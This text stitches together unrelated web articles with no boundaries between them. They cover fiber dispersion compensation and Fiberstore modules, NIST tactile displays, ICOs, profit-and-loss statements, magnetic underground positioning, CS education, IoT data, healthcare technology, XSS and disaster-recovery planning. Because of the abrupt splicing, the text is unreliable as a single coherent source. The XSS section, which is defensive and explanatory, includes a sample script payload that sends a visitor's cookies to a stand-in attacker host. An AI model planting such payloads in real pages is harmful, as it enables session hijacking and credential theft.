Modal Dispersion – Modal dispersion occurs only in multimode fibers. In a multimode fiber with a step profile of the refractive index, all rays travel at the same speed – the rays traveling along the fiber axis have the same speed as the rays traveling close to the core-cladding interface. Because they cover optical paths of different lengths at the same speed, they reach the detector at different times. This leads to temporal pulse broadening at the end of the fiber, which is called modal dispersion. Polarization mode dispersion (PMD) is a form of modal dispersion in which two different polarizations of light in a waveguide, which normally travel at the same speed, travel at different speeds due to random imperfections and asymmetries, causing random spreading of optical pulses.
Waveguide Dispersion – Waveguide dispersion is chromatic dispersion that arises from waveguide effects: the dispersive phase shifts for a wave in a waveguide differ from those the wave would experience in a homogeneous medium. Waveguide dispersion is important in waveguides with small effective mode areas; for fibers with large mode areas it is normally negligible, and material dispersion dominates.

Material Dispersion – Material dispersion is the phenomenon whereby a material causes a “bundle” of light to spread out as it propagates. It is also a kind of chromatic dispersion. Material dispersion is harmful in optical communications in that it limits how much data can be sent, as the pulses will overlap and information will be lost. Waveguide dispersion and material dispersion are both forms of chromatic dispersion.

In high-bit-rate (such as 10 or 40 Gbit/s) long-haul fiber-optic transmission systems, dispersion compensation is one of the most important design considerations. Management or optimization of residual dispersion is required for photonic networks, i.e., for fibers, repeaters and optical interfaces. In addition, PMD compensation is also required, especially for 40 Gbit/s or higher bit-rate long-haul systems. In short, dispersion compensation is an important issue for fiber-optic links. Nowadays, there are many dispersion compensation solutions in fiber optics, such as the dispersion compensation module (DCM), dispersion compensating fiber (DCF), fiber Bragg gratings and chirped fiber Bragg gratings. In optical fiber communications, dispersion compensation modules (DCMs) can be used to compensate the chromatic dispersion of a long span of transmission fiber. Typically, such a module provides a fixed amount of dispersion (e.g., normal dispersion in the 1.6-μm spectral region), although tunable dispersion modules are also available.
A module can easily be inserted into a fiber-optic link because it has fiber connectors for the input and output. The insertion losses may be compensated with a fiber amplifier, e.g. an EDFA in a 1.5-μm telecom system. A dispersion compensation module is often placed between two fiber amplifiers.

Fiberstore Dispersion Compensation Module Solution

The Dispersion Compensation Modules (DCMs) are building blocks of the Fiberstore CWDM & DWDM Optical Transport System and serve at optical communication nodes to provide negative chromatic dispersion, counteracting the pulse-spread phenomenon that limits the bit rate and maximum transmission distance of data along optical fibers. The FS-DCM series modules, based on mature and reliable Dispersion Compensating Fiber (DCF) technology, are designed for 19-inch rack-mount configuration and compensate chromatic dispersion at rates including 10 Gbps, 40 Gbps and even 100 Gbps in ultra-long-haul coherent networks, such as SDH high-bit-rate transmission systems, DWDM networks and CATV long-haul transmission systems. These modules achieve dispersion values of -10 to -2100 ps/nm at the 1550 nm wavelength and supply broadband dispersion-slope compensation for standard single-mode fiber (SMF-28, G.652) across the entire C-band while maintaining an extremely low and flat insertion loss as well as low latency. The FS-DCM series is a single-slot module that typically connects to the mid-stage of a Fiberstore optical amplifier, e.g. an EDFA, in a long-haul transmission system. The optical budget is not affected if the FS-DCM series is connected to an optical amplifier with mid-stage access. Furthermore, compensation distances ranging from 10 km to 140 km are available.
| Part No.   | Description                                           | Connector Options |
|------------|-------------------------------------------------------|-------------------|
| FS-DCM-10  | 19″ 1U FS-DCM-10 Dispersion Compensation Module 10KM  | LC/UPC            |
| FS-DCM-20  | 19″ 1U FS-DCM-20 Dispersion Compensation Module 20KM  | LC/UPC            |
| FS-DCM-30  | 19″ 1U FS-DCM-30 Dispersion Compensation Module 30KM  | LC/UPC            |
| FS-DCM-40  | 19″ 1U FS-DCM-40 Dispersion Compensation Module 40KM  | LC/UPC            |
| FS-DCM-50  | 19″ 1U FS-DCM-50 Dispersion Compensation Module 50KM  | LC/UPC            |
| FS-DCM-60  | 19″ 1U FS-DCM-60 Dispersion Compensation Module 60KM  | LC/UPC            |
| FS-DCM-70  | 19″ 1U FS-DCM-70 Dispersion Compensation Module 70KM  | LC/UPC            |
| FS-DCM-80  | 19″ 1U FS-DCM-80 Dispersion Compensation Module 80KM  | LC/UPC            |
| FS-DCM-90  | 19″ 1U FS-DCM-90 Dispersion Compensation Module 90KM  | LC/UPC            |
| FS-DCM-100 | 19″ 1U FS-DCM-100 Dispersion Compensation Module 100KM | LC/UPC           |
| FS-DCM-110 | 19″ 1U FS-DCM-110 Dispersion Compensation Module 110KM | LC/UPC           |
| FS-DCM-120 | 19″ 1U FS-DCM-120 Dispersion Compensation Module 120KM | LC/UPC           |
| FS-DCM-140 | 19″ 1U FS-DCM-140 Dispersion Compensation Module 140KM | LC/UPC           |

Typical Application Cases of FS-DCM Series
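The kilometre ratings in the table above map to a simple dispersion budget: standard G.652 fiber accumulates roughly +17 ps/nm per kilometre at 1550 nm, so a span of length L needs about -17·L ps/nm of negative dispersion from the module. A minimal sketch, assuming that typical coefficient (it is a textbook figure, not a Fiberstore specification):

```python
# Rough dispersion-budget sketch for sizing a DCM.
# Assumes a typical G.652 fiber dispersion of +17 ps/(nm*km) at 1550 nm;
# real values vary with fiber type and wavelength.

FIBER_DISPERSION_PS_PER_NM_KM = 17.0  # typical value, not vendor-specified

def required_dcm_dispersion(span_km: float) -> float:
    """Negative dispersion (ps/nm) a module must supply to null the span."""
    return -FIBER_DISPERSION_PS_PER_NM_KM * span_km

def residual_dispersion(span_km: float, dcm_ps_nm: float) -> float:
    """Dispersion left over after compensation (ps/nm)."""
    return FIBER_DISPERSION_PS_PER_NM_KM * span_km + dcm_ps_nm

# An 80 km span accumulates about +1360 ps/nm, so an "80 km" module
# should supply roughly -1360 ps/nm.
print(required_dcm_dispersion(80))        # -1360.0
print(residual_dispersion(80, -1360.0))   # 0.0
```

Under this assumption, the quoted -2100 ps/nm upper limit corresponds to a span of roughly 120-140 km, consistent with the largest modules in the table.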
Seeing is believing, unless you're blind or visually impaired. To this group, the National Institute of Standards and Technology (NIST) says, "try feeling is believing." Computer scientists and engineers in NIST's Information Technology Laboratory (ITL) have created two tactile graphic displays that bring electronic images to the blind and visually impaired in the same way that Braille makes words readable. The first graphic display technology, introduced as a prototype in 2002, conveys scanned illustrations, map outlines or other graphical images to the fingertips, and can translate images displayed on Internet Web pages or in electronic books. It uses refreshable tactile graphic display technology, allowing a person to feel a succession of images on a reusable surface. The machine uses about 3,600 small pins -- known as actuator points -- that can be raised in any pattern, and then locked into place to hold the pattern for reading. The actuator points then can be withdrawn and reset in a new pattern, allowing the tactile reading to continue through a variety of images. Each image is sent electronically to the device, which uses software to determine how to create a tactile display that matches the image. An array of about 100 small, very closely spaced (1/10 of a millimeter apart) actuator points set against a user's fingertip is the key to the second tactile graphic display technology. To "view" a computer graphic with this technology, a blind or visually impaired person moves the device-tipped finger across a surface like a computer mouse to scan an image in computer memory. The computer sends a signal to the display device and moves the actuators against the skin to "translate" the pattern, replicating the sensation of the finger moving over the pattern being displayed. 
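The image-to-pins translation described above (raising actuator points wherever the source image is dark) amounts to thresholding a grayscale image into a binary map. A minimal sketch, assuming an 8-bit grayscale input and a fixed threshold; this is illustrative, not NIST's actual software:

```python
def image_to_pin_pattern(pixels, threshold=128):
    """Map an 8-bit grayscale image (list of rows of 0-255 values) to a
    pin pattern: True = pin raised, False = pin retracted.
    Dark pixels raise pins so the image's lines become a raised relief."""
    return [[value < threshold for value in row] for row in pixels]

# A tiny 3x3 "image": dark diagonal stroke on a light background.
image = [
    [ 20, 240, 240],
    [240,  20, 240],
    [240, 240,  20],
]
pattern = image_to_pin_pattern(image)
print(pattern[0][0], pattern[0][1])  # True False
```

A real display would then drive the actuator array from this boolean grid, locking raised pins in place for reading as the article describes.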
With further development, this technology could possibly be used to make fingertip tactile graphics practical for virtual reality systems or give a detailed sense of touch to robotic control (teleoperation) and space suit gloves. The inspiration for both tactile graphic displays came from a "bed of nails" toy found in a novelty store. Watching the pins in the toy depress under fingers and then return to their original state started the ITL team thinking about how the principle could be applied to electronic signals. Image Courtesy of NIST.
Just as blockchain, the technology that underlies bitcoin and other cryptocurrencies, continues to show potential in transforming many industries, it is also showing its potential in the crowdfunding and investment domain. The Initial Coin Offering (ICO) has become a popular way to raise funds for projects that are based on blockchain and cryptocurrencies. An ICO is a cryptocoin crowdsale, where a blockchain-based project allows enthusiasts and supporters to invest in the project by purchasing part of its cryptocurrency tokens in advance. ICOs usually take place in the early phases of a project, and the raised funds are then used to pay development and launch expenses. One of the most successful examples was the famous cryptocurrency project Ethereum, which raised $18 million in its ICO and reached an approximately $1 billion market cap in 2016.

How does an ICO differ from other forms of investment?

ICOs are often compared to crowdfunding and IPOs. But while they have common traits with both, they are unique in their own way and bring innovations to the investment landscape that weren’t possible before. They resemble IPOs (Initial Public Offerings) in that they are used to sell a stake and raise money, and they offer investors potential profit in exchange for the risk of a possible failure to deliver on the promise. However, ICOs also differ from IPOs and resemble crowdfunding campaigns in the sense that they are supported by early enthusiasts who want to invest in a product or service that hasn’t been launched yet. As opposed to crowdfunding, which is basically a sort of donation, participants in ICOs have a financial stake and hope to obtain a return on their contribution. An ICO, then, is a mix between a donation and an investment, somewhere between an IPO and Kickstarter.

How does it work?
ICOs are usually announced on cryptocurrency forums such as Bitcointalk, where the project team presents their idea along with a whitepaper and other documentation, timelines, goals and other information that will help potential investors understand and evaluate the project. Since ICOs happen before project completion, being transparent and comprehensive about the details of the project is key to gaining trust and appreciation. After the ICO’s launch, cryptocurrency tokens are made available for sale; they will have value in the future for those who will work with the platform. The preferred currency for ICOs is bitcoin. ICOs last at least a few weeks, during which the project tries to raise as much money as possible. In some cases, ICOs will place a cap on the total amount raised (a good practice). If the ICO manages to raise sufficient funds, the project goes ahead to the next step. Once the ICO is completed and the project launched, the ICO tokens get listed on cryptocurrency exchanges to trade against other cryptocurrencies. The price usually reflects the overall cryptocurrency market sentiment, project-specific news, and the addition of new features. Developers who will later want to build their own applications on top of these platforms are usually drawn to ICOs.

What’s the advantage of ICOs?

An ICO is a great way to bootstrap a blockchain-based project and gain the initial capital necessary to gather a talented team and get started. It is possible to raise as much as a round of Silicon Valley seed funding. The difference, however, is that you do not need to give up equity for the money you raise. An ICO removes many of the hurdles present in the VC process and allows startups to short-circuit their way to the market by directly presenting the idea to potential customers. This way, the process also provides a way to gauge general interest in the project, in the same way that presale works for Kickstarter projects.
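The capped-sale practice mentioned above can be sketched as a small ledger that rejects any contribution that would push the total past the hard cap. The names and the fixed token rate here are illustrative assumptions, not any real ICO contract:

```python
class CappedSale:
    """Toy token sale: accepts contributions until a hard cap is hit."""

    def __init__(self, cap, tokens_per_coin):
        self.cap = cap                      # maximum coins to accept
        self.tokens_per_coin = tokens_per_coin  # fixed conversion rate
        self.raised = 0.0
        self.balances = {}                  # investor -> tokens owed

    def contribute(self, investor, amount):
        """Credit tokens for a contribution, or reject it past the cap."""
        if self.raised + amount > self.cap:
            return False  # reject: would exceed the hard cap
        self.raised += amount
        tokens = amount * self.tokens_per_coin
        self.balances[investor] = self.balances.get(investor, 0) + tokens
        return True

sale = CappedSale(cap=100.0, tokens_per_coin=50)
print(sale.contribute("alice", 60))  # True
print(sale.contribute("bob", 60))    # False -- 120 would exceed the 100 cap
print(sale.balances["alice"])        # 3000
```

A production crowdsale would live on-chain (e.g. as a smart contract), but the cap logic is the same: check before crediting.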
Also, due to the open-source nature of blockchain projects and ICOs, it is possible to fork a project and create similar ones that are slightly different and cater to the preferences of more targeted audiences, in order to weigh the market viability of different variations of the project.

What’s the pitfall?

The problem with ICOs is that many of them have turned out to be scams, or ideas that never materialized or failed to deliver on their promises. Building on the hype surrounding cryptocoins in general, many teams launched projects that weren’t even centered on a solid idea, and not enough research was done to prove the viability of the project. Investors, on the other hand, often cling to the general success of bitcoin and ethereum and see every ICO and blockchain project as a chance to make easy money. Following several cases of failed projects and outright scams, there’s been a rise in wariness and skepticism toward ICOs, and the landscape is gradually regulating itself by adopting a set of rules and best practices to evaluate every project. There are now several platforms that perform due diligence on ICOs and help investors better decide where to spend their money. This is also forcing development teams to be clearer and more transparent about their projects. Another problem with ICOs is that, unlike VC investments, they’re not regulated or registered with any government or organization and offer no investor protection. They owe this characteristic to the nature of the bitcoin and blockchain technologies that support them.

The future of ICOs

The ICO is still young and nascent and is still undergoing its development phases. But the promise surrounding it could eventually turn it into a new form of democratized investment that rivals all the traditional forms being used today.
A profit and loss (P&L) statement tells a company's owners and stakeholders quite simply how it's doing, serving as a report card on financial performance. But unlike in school, this report card isn't as simple as A through F. So let's examine what a P&L statement tells you and why and how it's organized.

What does a P&L tell you?

Basically, a P&L reports revenues and expenses for a specific period of time. P&Ls typically cover a month, a quarter or a year. The P&L starts off at zero at the beginning of the reporting period and summarizes the activity that occurred during the period. Most business owners start at the top of the report — the "top line" — to see how much money they brought in and then jump right to the bottom to see how much was left over after expenses — the "bottom line," net income or profit. The top line and the bottom line are critically important to understanding performance, but the important management decisions use the detail from the middle of the report.

What doesn't the P&L tell you?

The P&L does not give you an accumulative score. For example, the score a sports team achieved in a game simply tells you what it scored in that game — not specifically how it played and why; nor how it's ranked in a season overall. A balance sheet is more the type of document that could summarize how a team had played over its entire season and history. P&Ls also do not give you trend data, which would tell you whether line items on the P&L are trending up or down and at what rate. The problem here is that you don't know when something is trending in the wrong direction until it becomes a serious problem. So it is important to use trend data every month in conjunction with your P&L.

How is a P&L organized?

At the top of the P&L are the revenues, in the middle are the costs of goods sold, followed by expenses, with net income at the bottom.
Any revenues or expenses that are not part of your normal business operations are generally called "other income and expenses."
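The top-to-bottom layout maps directly to arithmetic: gross profit is revenue minus cost of goods sold, and net income is gross profit minus expenses, adjusted for other income and expenses. A minimal sketch with made-up figures:

```python
def profit_and_loss(revenue, cogs, expenses, other=0):
    """Return (gross_profit, net_income) for one reporting period.
    `other` holds the non-operating "other income and expenses" line."""
    gross_profit = revenue - cogs        # the middle of the report
    net_income = gross_profit - expenses + other  # the "bottom line"
    return gross_profit, net_income

# Illustrative month: $50k top line, $20k COGS, $18k operating expenses.
gross, net = profit_and_loss(50_000, 20_000, 18_000)
print(gross, net)  # 30000 12000
```

The same two subtractions are what any accounting package performs when it renders the statement.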
GPS systems quickly went from a luxury item to a necessity to a ubiquitous contributor to the geographic ignorance of Americans, many of whom rely on their smartphones' ability to give directions to every place they go to keep from having to learn the way themselves. That's a problem when GPS is suddenly unavailable. When the battery dies. When you drive under a bridge and the GPS thinks you jumped to the highway above or below. When you go into a tunnel and disappear entirely. Two biology researchers from Oxford University are trying to remedy that, using GPS technology they adapted to keep track of badgers in suburban wilderness outside the city of Oxford. Andrew Markham and Niki Trigoni, both post-doctoral researchers and instructors at Oxford's Department of Computer Science drew quite a lot of attention to themselves and to Oxford's suburban badger population with a system designed to monitor what the badgers were up to when they were underground. Badgers forage and do most other things above ground by themselves, for the most part, but evidently have a rich communal social life underground. Putting a camera in the burrows would provide a picture of one room, but not a macro picture of what was going on elsewhere. "It is quite challenging to identify badgers when they are underground," Markham told the BBC last year. Rather than string cameras throughout the burrows, or string GPS antennas, the research team planted a series of antennas that would project magnetic fields of varying intensity to cover the whole area of the burrows. Individual badgers got special collars with sensors capable of detecting the fields, tracking their intensity and recording it. When each badger came aboveground the radio in its collar sync'd with servers attached to the antenna network, giving researchers detailed information about where the badger had been during its time out of sight. 
Because they used very low-frequency magnetic fields, the network Markham and Trigoni built was able to penetrate far deeper underground than radio waves – the medium on which GPS depends. The two found the data they gathered showed not only good badger-tracking capabilities, but also the ability to identify a spot in three dimensions without having to receive signals from three points to calculate location by triangulation. The changing patterns of magnetic fields created a unique signature at each point near the transmitter. Low-frequency magnetic fields penetrated the ground and other solid objects more deeply than radio could have and provided a good depth metric via predictable changes in field intensity. The result was the ability to "triangulate" the position of a sensor using only one antenna and no triangulation at all. "Our technology can work out your position in three dimensions from a single transmitter. It can even tell you which way your device is facing," Markham told Wired. Seeing an opportunity to move out of badgers and into location services, Markham and Trigoni took their system to Isis Innovation, a company owned by Oxford University whose job it is to commercialize scientific findings generated there. The two are looking for 1.7 million pounds in seed capital to fund their startup, OneTriax, which is working on a version of the receiver that would run on Android. Smart phones already have magnetometers and electronic compasses they use to orient the screen and locate cell-phone towers. With slightly more processing power and greater sensitivity, those sensors could also pick up enough magnetic data to be used as a backup location system when line-of-sight GPS radio waves just won't cut it. Making it work will require an advance in signal processing, but not a huge leap. Badger-net pickups rely on a signal with more information in it than a typical GPS radio signal, so reception will still be a challenge, Markham said. 
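The single-transmitter positioning rests on a physical fact: the far-field magnitude of a quasi-static magnetic dipole falls off roughly as 1/r³, so a measured intensity can be inverted to a distance from one antenna. A hedged sketch; the inverse-cube model and the calibration constant are textbook approximations, not the researchers' actual algorithm:

```python
# Distance-from-intensity sketch under the far-field magnetic dipole
# approximation: |B| ~ k / r^3, where k is a calibration constant
# (illustrative here) fixed by the transmitter's strength and geometry.

def field_intensity(k, r):
    """Field magnitude at distance r for calibration constant k."""
    return k / r**3

def distance_from_intensity(k, b):
    """Invert the inverse-cube law to estimate distance from a reading."""
    return (k / b) ** (1.0 / 3.0)

k = 8.0                        # illustrative calibration constant
b = field_intensity(k, 2.0)    # reading at 2 units away
print(b)                       # 1.0
print(distance_from_intensity(k, b))  # approximately 2.0
```

In practice the team exploited the field's direction as well as its magnitude, which is what lets one antenna also recover orientation, not just range.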
The two have already developed the software to process it, however, and are working on ways to improve on the roughly 30 cm accuracy the badger network was able to achieve. Within four years, Markham predicts, smartphones will be manufactured with his and Trigoni's underground GPS capability. Then the only problems will be extending all those GPS networks with magnetic broadcasting stations, figuring out how to hand responsibility for location from one to the other as the user's location changes and deciding whether or not they'll have to pay the badgers a royalty.
President Obama announced Wednesday that the White House will be hosting a Computer Science for All summit, and that agencies and industry partners are acting in support of computer science (CS) education. The National Science Foundation (NSF) will award $25 million in grants for CS education, the new CSforAll Consortium will assist teachers and track progress, and 200 private organizations have committed to expanding CS opportunities. “In the coming years, we should build on that progress by…offering every student the hands-on computer science and math classes that make them job-ready on day one,” said Obama in the 2016 State of the Union Address. Nine out of 10 parents said that they want CS to be taught in schools; however, only one quarter of all schools in the United States offer advanced computer science with programming and coding, according to a blog post from Megan Smith, U.S. chief technology officer. By 2018, 51 percent of all STEM jobs will be in a CS-based field, according to a White House Fact Sheet. “Tech careers are exciting, fun, high-impact, and collaborative as well as being critical for our economy,” Smith said. “We want all Americans to have the opportunity to be part of these teams. CS For All will help make that a reality and ensure every student has access to Computer Science in their classrooms at all levels.” The Girl Scouts of the USA are launching a program to provide CS opportunities to 1.4 million girls annually. Also, Project Code Nodes is collaborating with the Partnership of African American Churches to start coding clubs for 70 girls in economically disadvantaged communities in Charleston, W.Va. SignUp.com and the CSforAll Consortium are creating an “idea center” to bring CS to the SignUp.com community of 8 million parents. Also, Code.org will launch a program to teach CS to seventh- through ninth-grade students.
“Because CS is an active and applied field of Science, Technology, Engineering and Math (STEM) learning that allows students to engage in hands-on, real-world interaction with key math, science, and engineering principles, it gives students opportunities to be creators—not just consumers—in the digital economy, and to be active citizens in our technology-driven world,” Smith said.
The Internet of Things is ingrained in today’s technology world, and is already becoming big news across a variety of industries. IoT sensors can be found in devices from smartphones and black boxes to cars and ships – all of which highlights the need for data analytics. It’s fair to say that while IoT is a relatively new phenomenon, there’s already a lot of opportunity. However, that’s not to assume this sphere of tech is without its challenges, because there are loads to choose from. The most challenging of all has to be the fact that IoT is creating masses of data that has nowhere to go. Indeed, according to a report from Cisco, the Internet of Things will create 400 zettabytes of data per year by 2018. As a result, organisations need to decide how they’re going to manage and make sense of the large volume of data they collect from IoT. There is, you could say, a big challenge with Big Data.

What’s Big Data?

Big Data, quite simply, refers to data sets too large and complex for everyday data-handling applications. It has become relevant in the last few years as technology has become more advanced. Due to these advancements, we’re at a point where organisations on a daily basis are collecting vast amounts of data – from business transactions, social media and, indeed, the Internet of Things. This opens up a number of problems they have to face and overcome in order to keep operations running smoothly. These include challenges with analysis, curation, storage, data sharing and privacy. But with all complications, there are always opportunities. If businesses manage Big Data correctly and accurately, they’re able to make operations easier for themselves, make better decisions, spot trends and reduce costs and risk. The question is, how do they do this?
Data science is a good starting point

While the Internet of Things is still in the early stages of its evolution, now is the perfect time for businesses to start thinking about how they’re going to cope with such tech and the data it brings. Mike Weston, CEO of data science consultancy Profusion, believes that the key thing for businesses at this stage is planning. He suggests: “Outline exactly what your goals are, and make it clear what you want to achieve. From there, putting in procedures and infrastructure that can collect information, clean it and make it accessible becomes a lot easier.”

Planning ahead may sound easy, but collecting data is pointless unless you have the tools to make sense of it. But data science, Weston says, can help. He tells Internet of Business: “Unlike normal data analytics, data science can go well beyond a cursory examination of information to allow the real-time analysis of disparate data sets to reveal profound and well-hidden insights.

“With enough information, future behaviour or actions can be predicted with a startling degree of accuracy. By collecting information from smart devices and marrying it with online behaviour, demographic information, economic news and other sets of information, a complete picture on an individual or a set of consumers can be created instantly. Then an ultra-personalised marketing campaign could be created.”

Ian Murphy, a principal analyst at Creative Intellect Consulting, sees a hardware-based solution here. He says: “The answer is solar powered, Linux-driven micro servers that are capable of managing large amounts of data in-memory and refining the data before it is transmitted.

“In the IBM Zurich research lab, scientists are already testing such micro servers that are no larger than a current DIMM module for a server, and when they go to production, they expect to reduce them potentially to the size of a compact flash card.
“This would enable the micro servers to be embedded into a wide range of IoT devices in the industrial, safety and information gathering worlds where they could carry out point of acquisition work through the use of their compute power.”

Sometimes you just have to make compromises

Roman Blinds is a manufacturer of blinds based in Yorkshire. In recent times, it’s been experimenting with apps that work with automated blinds to help maintain a preselected temperature or light level. Although such apps would provide the business with mass market opportunity, it’s been struggling with the amount of data that comes from the sensors it’s been working with. To deal with this situation in the short term, the firm has had to limit the sensors in order to prevent the blinds from adjusting. As well as this, it’s been putting the data into a simple database, which it says is “not the most efficient way of doing things”. Nevertheless, it’s not given up and aims to get its blinds to market soon.

Collecting so much data can bring about privacy concerns

Clearly, by combining different sets of data in a process of analysis, businesses are able to identify potential leads. However, when you consider just how much data can be involved, there are obviously going to be privacy concerns. Most of this data is based on customer and client information, after all. This is why transparency is extremely important. Weston says: “People need to understand and approve of what you intend to do with their information. Also, and it should go without saying, a business needs to offer something in return for collecting and using personal information, whether it’s an improved product, better customer service or more relevant marketing information.”
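The edge-side refinement Murphy describes (reducing raw sensor volume before transmission) can be sketched as simple windowed averaging on the device. The window size and the sensor readings are illustrative assumptions:

```python
def refine(readings, window=4):
    """Collapse each full block of `window` raw readings into its average,
    shrinking the volume sent upstream by a factor of `window`.
    Trailing readings that don't fill a window are held for the next batch."""
    out = []
    for i in range(0, len(readings) - window + 1, window):
        block = readings[i:i + window]
        out.append(sum(block) / window)
    return out

# Eight raw samples become two summary values for transmission.
raw = [20, 20, 20, 20, 24, 26, 24, 26]
print(refine(raw))  # [20.0, 25.0]
```

Real edge pipelines add filtering and anomaly flags on top, but the principle is the same: compute close to the sensor, transmit only the distilled result.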
10 Emerging Healthcare Technologies

New technologies are constantly in development to help people stay healthy, better diagnose disease, treat illness, and provide a better quality of life. Here are some examples:

- Intelligent Pills Deliver Medication to Specific Locations: Philips Research has developed an intelligent pill that can be programmed to deliver targeted doses of medication to patients with digestive disorders such as Crohn’s disease, colitis, and colon cancer.1
- Sensor Technology Tracks Medication Adherence: Proteus Biomedical is working on technology that incorporates a tiny sensor into pills for targeting medication adherence for organ transplants, cardiovascular disease, infectious diseases, diabetes, and psychiatric disorders.2
- Brain Implants Prevent Seizures: The RNS System, a responsive neurostimulator from NeuroPace, detects abnormal electrical activity in the brain that signals the onset of a seizure, and delivers a specific pattern of mild electrical stimulation to block the seizure.
- Contact Lens Detects Glaucoma: Sensimed’s scientists have created a smart contact lens with an embedded microchip that monitors intraocular pressure. If a patient wears the contact lens for a day, glaucoma can be detected sooner and more reliably, and the efficacy of the treatment can be monitored over time, potentially averting blindness.3
- Artificial Pancreas for Diabetics: Researchers at Massachusetts General Hospital and Boston University have successfully completed a trial with 11 type-1 diabetic patients using a new “artificial pancreas”4 that consists of insulin pumps, glucose sensors, and regulatory software.
- Printing New Skin: Wake Forest University’s scientists have discovered how to apply ink-jet printer technology to ‘print’ proteins directly onto a burn victim’s body for faster and more thorough healing.5
- Artificial Retina: The U.S. Department of Energy’s (DOE) Artificial Retina Project — a collaboration of five DOE national laboratories, four universities, and private industry — is developing a retinal prosthesis. To date, progress has been made by enabling direct communication between the implant and the neural cells that carry visual information to the brain.6
- Video Games Hone Medical Student Decision-Making Skills: The University of Texas, Corpus Christi, and BreakAway Ltd., have developed a ‘serious’ video game that lets professionals and students practice on 3D video patients using the same interactive techniques and decision-making processes they would use with real patients.
- Robot Care Givers: MIT’s “Huggable” teddy bear robot can serve as a medical communicator for children. Packed with electronic sensors and sensitive skin technologies, the robot can distinguish between cuddling for comfort or agitation by sensing the strength of the squeeze.7
- Lab-on-a-Chip: Researchers at the University of California, Davis, have created a lab-on-a-chip for HIV testing that does not require expensive resources and can deliver results in seconds. The portable and less expensive lab-on-a-chip is a holographic, lens-free imaging mechanism that counts specific molecules and blood cells to determine if the blood is HIV positive.8
XSS or Cross Site Scripting, while not a new threat, is becoming increasingly common. Further, this threat is being leveraged more and more to perform phishing attacks. Since financial institutions are the target in the vast majority of phishing attacks, these businesses must take steps now to ensure the safety of their clients. What Is XSS? Though the acronym may look similar to RSS (Really Simple Syndication), XSS (Cross Site Scripting) is nothing like it at all, and is actually one of the more problematic security threats facing enterprises with a Web presence. In an XSS attack, hackers maliciously insert code into an improperly secured Web page. Thereafter, anyone who visits the Web page is susceptible to whatever actions that code can execute. Depending on the nature of the XSS attack (three main types exist: reflected, stored, and DOM-based), the user's session can be hijacked, sensitive information about the user (such as login credentials) can be captured, or the user's device can be infected with malware.
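The root cause in most XSS attacks is that user-supplied input is echoed back into a page without encoding. A minimal sketch of the vulnerability and the standard mitigation, using Python's standard-library `html.escape`; the page fragment and payload here are illustrative, not taken from any real incident:

```python
import html

def render_comment_unsafe(comment: str) -> str:
    # Vulnerable: user input is interpolated into the page verbatim,
    # so a <script> payload executes in every visitor's browser.
    return "<div class='comment'>" + comment + "</div>"

def render_comment_safe(comment: str) -> str:
    # Mitigated: HTML metacharacters are encoded, so the same payload
    # is rendered as inert text instead of being parsed as markup.
    return "<div class='comment'>" + html.escape(comment) + "</div>"

# A classic session-stealing payload an attacker might post as a "comment"
payload = "<script>new Image().src='//evil.example/?c='+document.cookie</script>"

unsafe = render_comment_unsafe(payload)  # script tag survives intact
safe = render_comment_safe(payload)      # becomes &lt;script&gt;... (harmless)
```

Output encoding of this kind is only one layer; real applications also need context-aware escaping for attributes, URLs, and JavaScript, which is why templating engines escape by default.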
Contingency Planning and Disaster Recovery Of the more than $40 billion that insurance companies paid out because of the Sept. 11 attacks, more than 25 percent–$11 billion–was for claims related to business interruption. Some industry experts say that among organizations that suffer significant, sustained disasters, 20 percent are completely out of business within 24 months. Yet most companies today do not have contingency plans. Many existing plans are out of date or ignore key human factors. Worse yet, many plans have not been tested. Contingency plans address the “availability” security principle. The availability principle addresses threats related to business disruption so that authorized individuals have access to vital systems and information when required. Contingency planning, also referred to as business continuity planning (BCP), is a coordinated strategy that involves plans, procedures and technical measures to enable the recovery of systems, operations and data after a disruption. The contingency plan must be developed with the input and support of line managers and all key constituencies, since the plan will need to work across the organization. The plan must be based on the risks faced by the organization, as well as risks associated with partners, suppliers and customers. All technology issues must be addressed in the context of business operations. The plan itself must be tested regularly and refined as required. The core objectives of contingency planning include the capability to: - Restore operations at an alternate site. - Recover operations using alternate equipment. - Perform some or all of the affected business processes using other means. Business Impact Analysis (BIA) One of the critical steps in contingency planning is business impact analysis (BIA). BIA helps to identify and prioritize critical IT systems and components. IT systems may have numerous components, interfaces and processes. 
BIA enables a complete characterization of system requirements, processes and interdependencies. As part of the BIA process, information is collected, analyzed and interpreted. The information provides the basis for defining contingency requirements and priorities. The objective is to understand the impact of a threat on the business. The impact may be economic, operational or both. Questionnaires or survey tools may be used to collect the information. It may be necessary for organizations to prioritize their sensitive business information into categories; an example of such a classification can be found in the Massachusetts Institute of Technology's Disaster Recovery and Business Resumption plans. Classification of Threats The National Institute of Standards and Technology (NIST) has identified three classifications of threats: natural (hurricane, tornado), human (operator error, terrorist attacks) and environmental (equipment failure, electric power failure). Systems are vulnerable to a variety of disruptions, ranging from mild, such as a short-term power outage or a disk-drive failure, to severe, such as equipment destruction or fire. Vulnerabilities may be minimized or eliminated through technical, management or operational solutions as part of the organization's risk management effort. However, it is impossible to eliminate all risks. Contingency planning is designed to mitigate the risk of system and service unavailability by focusing on effective and efficient recovery solutions. Components of a Contingency Plan Every business must develop a contingency plan. Responsibility for the contingency planning process typically rests with a contingency planning coordinator. This individual may be the security officer, the CIO or an individual with management responsibilities and experience in this area. It is recommended that the organization formally identify this person and the team that will be working to develop the contingency plan.
The contingency plan document must specifically address the following critical components: - Data Backup Plan (Administrative Safeguard): A documented and routinely updated plan to create and maintain retrievable exact copies of information for a specific period of time. Successful data backup and restores are sometimes dependent on business processes and “batch” activities. The organization needs to carefully test all critical backups and restores on a schedule related to the criticality of data to the organization. - Disaster Recovery Plan (Administrative Safeguard): Provides a blueprint to continue business operations in the event that a catastrophe occurs. The disaster recovery plan must include contingencies for the period during the disaster and until the recovery plan can be completely implemented. - Emergency Mode Operation Plan (Administrative Safeguard): The part of an overall contingency plan that contains a process enabling an enterprise to continue to operate in the event of fire, vandalism, natural disaster or system failure. Organizations must consider identifying the levels of emergencies and associated responses. - Testing and Revision Procedure (Administrative Safeguard): Procedures for the processing of periodic testing of written contingency plans to discover weaknesses and, subsequently, revising the documentation if necessary. These written testing and feedback mechanisms are the key to successful tests. The tests conducted may be walkthroughs or document reviews, simulation tests or checklist tests, or may very well be a full interruption test to check all aspects of the contingency plan. - Applications and Data Criticality Analysis (Administrative Safeguard): The purpose of applications and data criticality analysis is to assess the relative criticality of specific applications and data in support of other contingency plan components. 
